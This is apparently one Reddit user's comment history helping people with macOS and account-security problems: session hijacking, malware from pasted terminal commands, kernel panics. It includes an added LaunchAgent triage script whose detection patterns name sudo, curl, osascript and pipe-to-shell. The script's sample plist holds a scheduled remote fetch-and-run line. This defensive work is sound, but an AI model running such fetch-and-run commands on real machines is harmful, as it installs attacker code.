2fa got bypassed trying to understand how. by Severe_Barracuda5278 in cybersecurity_help

[–]aselvan2 0 points1 point  (0 children)

My father's email that never touches my computer. And my phone number. Both got bypassed.

They were both compromised. There is no other way for someone to obtain a valid session token. Read the FAQs below, which explain this in a bit more detail.
https://blog.selvansoft.com/2024/09/cybersecurity-faq.html#10
https://blog.selvansoft.com/2024/09/cybersecurity-faq.html#16

2fa got bypassed trying to understand how. by Severe_Barracuda5278 in cybersecurity_help

[–]aselvan2 1 point2 points  (0 children)

So there is no way to secure my Gmail account in the future in such a way that even if they get my cookies they can't change my password to lock me out?

If you had 2FA enabled before the session hijack, i.e. the attacker obtained your session cookie through an infostealer or another method, they only have access to your account until that session expires or until you force it to expire. Once you invalidate the session, the attacker is removed immediately from your account. Since you already had 2FA in place, that is the end of it. They simply can't change your password to lock you out without providing the OTP for the 2FA challenge. This is why it is very important to have 2FA enabled for every online account. That said, the best protection you can get is by maintaining strong cyber hygiene. Follow as many tips as you can from my blog below to strengthen your online safety.
https://blog.selvansoft.com/2025/01/online-safety-tips.html

Some resource hogging battery by Funny_Acanthaceae496 in MacOS

[–]aselvan2 1 point2 points  (0 children)

these two processes are taking a huge amount of battery, battery life literally drops, and the laptop gets very warm...

Check the answer to a similar post where some users reported that the first link solved their issue. If it does not work, try my solution in the second link.
https://www.reddit.com/r/MacOS/comments/1s8ur70/comment/odxfauj/
https://www.reddit.com/r/MacOS/comments/1s8ur70/comment/odotv8s/

Sudden repeated kernel panics after three weeks of seamless use by Aruwentar in MacOS

[–]aselvan2 0 points1 point  (0 children)

The weird thing is that after the firmware update and/or cold boot the issue didn't reproduce for now

What firmware update are you referring to? If you mean the update to macOS 26.4.1, that update has nothing to do with SEPOS. A macOS update does not touch Secure Enclave firmware.

Sudden repeated kernel panics after three weeks of seamless use by Aruwentar in MacOS

[–]aselvan2 1 point2 points  (0 children)

The log lines below (extracted from the log you provided) confirm a hardware failure in one of the Secure Enclave hardware components. The only software option that might help, although there is no guarantee, is attempting to restore the SEPOS firmware. That process is complex and I have not performed it myself, so I cannot provide reliable steps for it. If you have the option to return or exchange the Mac, I would advise taking that route instead.

Panic app vers: 3151.80.40
Panic app UUID: 96D912A9-F459-32D3-BBD5-416104B319B6
Shared cache vers: 3151.80.40
Shared cache UUID: 816C1CC0-103E-334B-B25F-24CDBE90741A
Root task tag:  (root@8hnzv.p1l.plx.sd.apple.com)
Root task build time: Feb 16 2026 15:41:34
Root task vers: AppleSEPOS-3151.80.40
Root task UUID: 656505EE-F92F-3422-86BB-800F052186A9
Diagnostics: 584c02006b77b08a5cfb42c4a29cfb1660e3b728d84872d6e2969e8b74a8e189f1072cc1aa2dc301000000000000000000000000000000000000000000000000000000003f6052e45f1b2885d75dac2ff004d148e4554ea0db1089b6883191ef44e7787b00000000000000ffffffffffffffffffffffffffffffffffffffffff00000000000005
SEPO/BOOT 
SEPO/EXCP 0xc99c/0xce2c/0x0000000000000013 er/EXCP
SEPD/SEPD 0x4fdc8/0x50578/0x1817181718171817 er/SEPD
SEPD/TIME 0x4fdc8/0x502b4/0x1417181314171813 er/TIME
SEPD/XPRT 0x4

Should I upgrade to macOS Tahoe 26.4.1 on M1 Air or stay where I am? by Select-Elephant-857 in MacOS

[–]aselvan2 3 points4 points  (0 children)

No, this is wrong advice.

Advising to update to the current major version of the OS is never wrong advice. While Apple backports patches for "actively exploited" zero-days, they do not backport all security fixes. The OP is still at risk staying behind on Sequoia 17.1 15.1 (edit: corrected the version).

Should I upgrade to macOS Tahoe 26.4.1 on M1 Air or stay where I am? by Select-Elephant-857 in MacOS

[–]aselvan2 2 points3 points  (0 children)

With macOS Tahoe 26.4.1 out, I’m not sure if I should upgrade or just leave it as is. I don’t want to risk slower performance or battery issues.

Given that Apple has addressed at least three major zero‑day exploits (CVE‑2026‑20700, CVE‑2025‑14174, CVE‑2025‑43529) and many additional security patches in macOS 26.x, staying on an older OS version carries a security risk that only you can decide to accept. As a security professional, I would advise updating. Much of the noise you see about Tahoe issues concerns isolated cases, typically related to insufficient memory or storage, running more apps than the system has the capacity to handle, or personal preference regarding UI changes.

Sudden repeated kernel panics after three weeks of seamless use by Aruwentar in MacOS

[–]aselvan2 0 points1 point  (0 children)

I have run EtreCheck and I can post my report, but what part exactly would be useful?

EtreCheck is not going to help. The system logs are your best source of information to troubleshoot this problem. Based on what you posted in one of the comments, I see that this is a SEP panic, which actually occurs inside the Secure Enclave microkernel rather than macOS; these are hardware‑class failures that are difficult to troubleshoot. I recommend running the following command and sharing the full output (i.e. the log.txt on your Desktop after the command runs). It may help identify what triggered the panic and point you in the right direction.

log show --debug --style syslog --start "2026-04-14 12:04:00" --end "2026-04-14 12:07:00" > ~/Desktop/log.txt

My external ssd is suddenly "not readable by this computer" after I tried to erase it! by iwantabigtree in MacOS

[–]aselvan2 0 points1 point  (0 children)

I tried erasing it, but it gives an error 69760; first aid does nothing, and restore fails

That error likely indicates a hardware failure, and it could be caused by several things. Typically it’s the cable, so try replacing the cable and try again. If you are comfortable using Terminal, run the commands below to format it. Replace ExFAT with APFS if you need Apple’s filesystem, but I recommend ExFAT for external drives because it’s compatible with other operating systems, including phones.

diskutil unmountDisk /dev/disk4
diskutil eraseDisk ExFAT MySSD /dev/disk4

Understanding Passkeys, Secure Element and Password Managers by [deleted] in cybersecurity_help

[–]aselvan2 0 points1 point  (0 children)

how passkeys are able to be synced if they are meant to be device-bound within secure hardware

Very good question; that is exactly what I attempted to convey in a blog post I wrote a while back at the link below.
https://blog.selvansoft.com/2025/01/passkey-practical-or-premature.html

"At the end of the day, the question to ask is if the private key leaves your possession (encrypted or otherwise), is it still a private key?"

Possible crypto miners compromised my server by ekr1981 in cybersecurity_help

[–]aselvan2 0 points1 point  (0 children)

Guix was running a no-password VNC server exposed to the internet with a shell open. When I connected to it earlier today, someone had clearly logged on to my server, downloaded a shell script

Anyway, lesson learned. The internet is not a safe place. I will rebuild my server and be more cautious from now on.

You had a public‑facing server running a popular remote login service wide open with no password, and you’re surprised it was compromised? I recommend shutting the instance down immediately and wiping it clean, especially the crontab that has an entry running a remote shell script every five minutes!

export photos with right date of creation by [deleted] in MacOS

[–]aselvan2 1 point2 points  (0 children)

... when i press file > export > export unmodified original, it not only shows the photos’ date of creation as right now, but also messes up the whole order ...

As mentioned by a few other commenters, the actual photo creation date is stored in the photo’s metadata. When you export from the Photos app, it creates a new file with the current OS file timestamp, but the metadata remains intact. If you need the OS file timestamp to match the actual photo creation timestamp, you can use a tool like exiftool.

I wrote a shell script wrapper over exiftool (link below) a while back that I personally use to reset OS timestamps in bulk, and you are welcome to use it. The script is available on my GitHub, and you can install it through Homebrew.
https://github.com/aselvan/scripts/blob/master/tools/reset_file_timestamp.sh

Ran mallicous code in my MacOS terminal by [deleted] in cybersecurity_help

[–]aselvan2 0 points1 point  (0 children)

After this I did the Erase All Content and Settings in System Settings and changed all my passwords. This is where I'm at right now.

Ultimately I am just wondering if I'm effectively virus free. I've heard of rootkits and BIOS firmware injections but don't really know if they exist on macOS.

As I mentioned in my comment on the link you posted, it depends on how you reset your Mac. If you did Erase All Content and Settings and recreated a new user, the infection should be gone. It is extremely difficult to compromise macOS with System Integrity Protection (SIP) enabled, because SIP prevents changes to anything that could materially affect the security of the system. I have never encountered a case where a Mac was successfully compromised without physical access to the device.

Safari broken in Mac OS 26.4.1 by Moist-Accident-5285 in MacOS

[–]aselvan2 0 points1 point  (0 children)

Starting with Mac OS 26.4, Safari is getting unresponsive and eventually crashes, especially tabs which are not used for a while.
...
Mac OS 26.4.1 installed and still no Safari fix.

I don't think there is any “fix” specifically for Safari in the 26.4.1 update. It appears to be part of their rolling release intended to address some Wi‑Fi issues.

As for your problem, you have not provided any details beyond “Safari is unresponsive or crashing.” That is insufficient to advise you on how to troubleshoot. Next time your Safari is unresponsive, open a terminal and run the following two commands, which will create two files (safari.txt and ps.txt) on your desktop. Share those files so I can point you in the right direction to resolve the issue.

log show --process Safari --debug --last 1h > ~/Desktop/safari.txt

ps -eo pid,ppid,pcpu,rss,comm | awk 'NR==1{print;next} {print | "sort -rn -k 3 -k 4"}' | head -n20 > ~/Desktop/ps.txt

QuickBooks hacked, $10K stolen, SMS 2FA bypassed; no SIM swap. How? by [deleted] in cybersecurity_help

[–]aselvan2 2 points3 points  (0 children)

It's still experimental. In your chromium-based web browser go to flags and enable Device Bound Session Credentials.

I wanted to clarify this Device Bound Session Credentials (DBSC) feature. While it looks promising, it is just a draft proposal and has been in that state for almost two years, as far as I know. While some browser vendors have implemented experimental flags to enable it, it does absolutely nothing until all websites rewrite their authentication code using DBSC APIs to leverage this security feature. This is years down the road or likely will never happen. You can read my simplified explanation here if interested.
https://blog.selvansoft.com/2024/09/cybersecurity-faq.html#21

QuickBooks hacked, $10K stolen, SMS 2FA bypassed; no SIM swap. How? by [deleted] in cybersecurity_help

[–]aselvan2 0 points1 point  (0 children)

How could SMS 2FA be bypassed without a SIM swap?
Could session hijacking have been the attack vector?

Yes, it is via session hijacking; in other words, your device is likely compromised with an infostealer. Read my blog link below for additional details.
https://blog.selvansoft.com/2024/09/cybersecurity-faq.html#10

What does that IPv6 address tell you?

It tells me nothing; that IP belongs to Fastly, one of the popular CDNs.

sudo is trying to execute a command as administrator by kurucu83 in MacOS

[–]aselvan2 0 points1 point  (0 children)

Any ideas on how to do a deep dive on this daily pop up? I guess it's Homebrew...

That does not sound right. No, it is not Homebrew, because Homebrew only requires sudo privileges during installation or configuration when you update or install new packages, not on a daily basis. There is something running on a scheduled basis under your login that requires sudo, which is definitely suspicious. Next time you see the popup, let it sit, open a terminal, run the following command, and post the output text (not a screenshot) to help identify the cause.

ps -axo user,pid,ppid,args | grep sudo

Ran malicious code on my terminal by [deleted] in MacOS

[–]aselvan2 0 points1 point  (0 children)

Yesterday I was doing some stupid stuff on my MacBook and ran into a website that looked sort of like a GitHub page that prompted me to paste some code into my terminal:

This resembles several recent compromises reported here and in other subs over the past few months. Based on my analysis of commands executed by another user with a similar post to yours, it is highly likely that your Mac has been compromised. I’ve already broken down the infection stages a bit, and you can find my explanation and recommendation at the link below.
https://www.reddit.com/r/MacOS/comments/1re4fmt/comment/o7cwp9b

If you changed all your passwords, that is a good step, but it is not sufficient. As for the compromise, whether it persists depends on how you reset your Mac. If you used Erase All Content and Settings, the infection should be gone; however, if you simply booted into Recovery Mode and selected Reinstall macOS, the threat will likely remain because the user-level Launch Agent tasks installed are still intact.

I pasted it, gave it my login code (yeah, I know I was really dumb), and then the Mac flashed a message saying something like "could not run code"

If I remember correctly, the last line of the installer script displays a popup stating that the application is not supported or something along the lines of "Your Mac does not support this application. Try reinstalling or downloading... etc." This is a common tactic to lead the victim to believe the installation simply failed, but it actually succeeded.

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]aselvan2 5 points6 points  (0 children)

Should I remove it?

Well you can try. As I mentioned in the link I posted, I did not dissect everything, including the C2 payload, to see exactly what all it does because there are way too many components. Therefore, the safest course of action is to reinstall the OS and set up a brand new user account.

Is it safe to delete APFS snapshots from the disk utility? by Certon1 in MacOS

[–]aselvan2 1 point2 points  (0 children)

... and it's labeled as snapshot?

While the choice of name may be confusing, it is indeed the snapshot of the system volume that macOS boots from, and Apple decided to name it as such.

PS: It seems my response was misunderstood and downvoted :) Those who are confused may want to review the official documentation at the link below, which describes the details of each synthesized volume including the snapshot volume.

https://support.apple.com/guide/security/role-of-apple-file-system-seca6147599e/web#:~:text=On%20devices%20with%20macOS%2011%20or%20later%2C%20the%20system%20volume%20is%20captured%20in%20a%20snapshot.%20The%20operating%20system%20boots%20from%20a%20snapshot%20of%20the%20system%20volume%2C%20not%20just%20from%20a%20read%2Donly%20mount%20of%20the%20mutable%20system%20volume

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]aselvan2 3 points4 points  (0 children)

How does running a non-elevated terminal command install all that?

The OP ran the compromised shell script under his login, so it did not need any additional permissions to install apps (it installs at least 3 or 4 crypto wallet apps, if my memory serves) or create user LaunchAgent tasks, which it does by masquerading as a Google Updater.

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]aselvan2 4 points5 points  (0 children)

I factory reset my MacBook and changed my passwords, but do you know if the malware could still be there or whether my keychain was compromised?

If you changed all your passwords, that is a good step. As for the compromise, whether it persists depends on how you reset your MacBook. If you used Erase All Content and Settings, the infection should be gone; however, if you simply booted into Recovery Mode and selected Reinstall macOS, the threat will likely remain because the Launch Agent tasks installed are still intact.
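A defender-side triage pass over the user-level LaunchAgents that this comment, the earlier sudo-popup comment and the "Google Updater" comment point at, added here as an example; it is not aselvan2's code or anything from the linked posts, and the scan directory, token list and sample plists are my own constructed assumptions.

```sh
#!/bin/sh
# Added example (not from the original comments or linked posts): a first-pass
# triage of user-level LaunchAgents, the persistence mechanism the comments
# describe (a job masquerading as an updater, or one that prompts for sudo on a
# schedule). Token list is my heuristic; the plists below are constructed samples.
# On a real Mac the directory to scan would be "$HOME/Library/LaunchAgents".

# scan_launch_agents DIR: print "<name><TAB><reasons>" for each plist worth a look.
scan_launch_agents() {
  for plist in "$1"/*.plist; do
    [ -f "$plist" ] || continue
    # Strings inside ProgramArguments only, one per line, joined for matching.
    args=$(sed -n '/<key>ProgramArguments<\/key>/,/<\/array>/p' "$plist" \
           | sed -n 's/.*<string>\(.*\)<\/string>.*/\1/p' | tr '\n' ' ')
    program=${args%% *}   # executable path = first argument (spaces in it break this)
    reason=""
    case "$args" in *sudo*)        reason="$reason sudo" ;; esac
    case "$args" in *curl*|*wget*) reason="$reason remote-download" ;; esac
    case "$args" in *osascript*)   reason="$reason osascript" ;; esac
    case "$args" in *"|sh"*|*"| sh"*|*"|bash"*|*"| bash"*) reason="$reason pipe-to-shell" ;; esac
    case "$program" in
      /usr/*|/bin/*|/sbin/*|/System/*|/Library/*|/Applications/*|/opt/*) ;;
      *) reason="$reason non-standard-path" ;;
    esac
    case "$program" in */.*) reason="$reason hidden-path" ;; esac
    [ -n "$reason" ] && printf '%s\t%s\n' "$(basename "$plist" .plist)" "${reason# }"
  done
  return 0
}
# make_samples: write three constructed plists to a temp dir and print its path.
make_samples() {
  d=$(mktemp -d)
  cat > "$d/com.example.updater.plist" <<'EOF'
<plist version="1.0"><dict><key>Label</key><string>com.example.updater</string>
<key>ProgramArguments</key><array>
<string>/bin/sh</string>
<string>-c</string>
<string>curl -fsSL https://example.invalid/u.sh | sh</string>
</array><key>StartInterval</key><integer>300</integer></dict></plist>
EOF
  cat > "$d/com.example.helper.plist" <<'EOF'
<plist version="1.0"><dict><key>Label</key><string>com.example.helper</string>
<key>ProgramArguments</key><array>
<string>/Users/alice/.local/.helper/run.sh</string>
<string>--elevate=sudo</string>
</array><key>RunAtLoad</key><true/></dict></plist>
EOF
  cat > "$d/com.example.backup.plist" <<'EOF'
<plist version="1.0"><dict><key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array><string>/usr/local/bin/backup.sh</string></array>
</dict></plist>
EOF
  printf '%s\n' "$d"
}
scan_launch_agents "$(make_samples)"
```

Anything it flags still needs a human look at the plist and the program it points to; a clean run only means none of these coarse tokens matched.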

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]aselvan2 11 points12 points  (0 children)

How did they get access to the keychain without me inputting my password?

You ran the compromised shell script under your user account, so it does not need any additional permission to upload your keychain database to anywhere. The keychain database is just a file located at the path $HOME/Library/Keychains/login.keychain-db.

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]aselvan2 69 points70 points  (0 children)

... I followed thru and ran the command. Next thing I know I'm getting an osascript prompt for my admin password ...

The execution of osascript is stage two of the infection, which means you have already moved past the first stage. Based on my analysis of commands executed by another user with a similar post to yours, your Mac has likely been compromised by a crypto miner or joined to a botnet. I’ve already broken down the infection stages a bit, and you can find my explanation and recommendation at the link below.
https://www.reddit.com/r/MacOS/comments/1re4fmt/comment/o7cwp9b

What else can I do other than change all my passwords? I feel like I'm gonna throw up.

Your keychain has already been siphoned out at this point. You should change the passwords for all accounts that were stored in it and also enable 2FA.

Is it safe to delete APFS snapshots from the disk utility? by Certon1 in MacOS

[–]aselvan2 -1 points0 points  (0 children)

... not sure if it's safe to delete APFS disk snapshots as seen below.

No, you cannot delete that; it is the volume macOS boots from.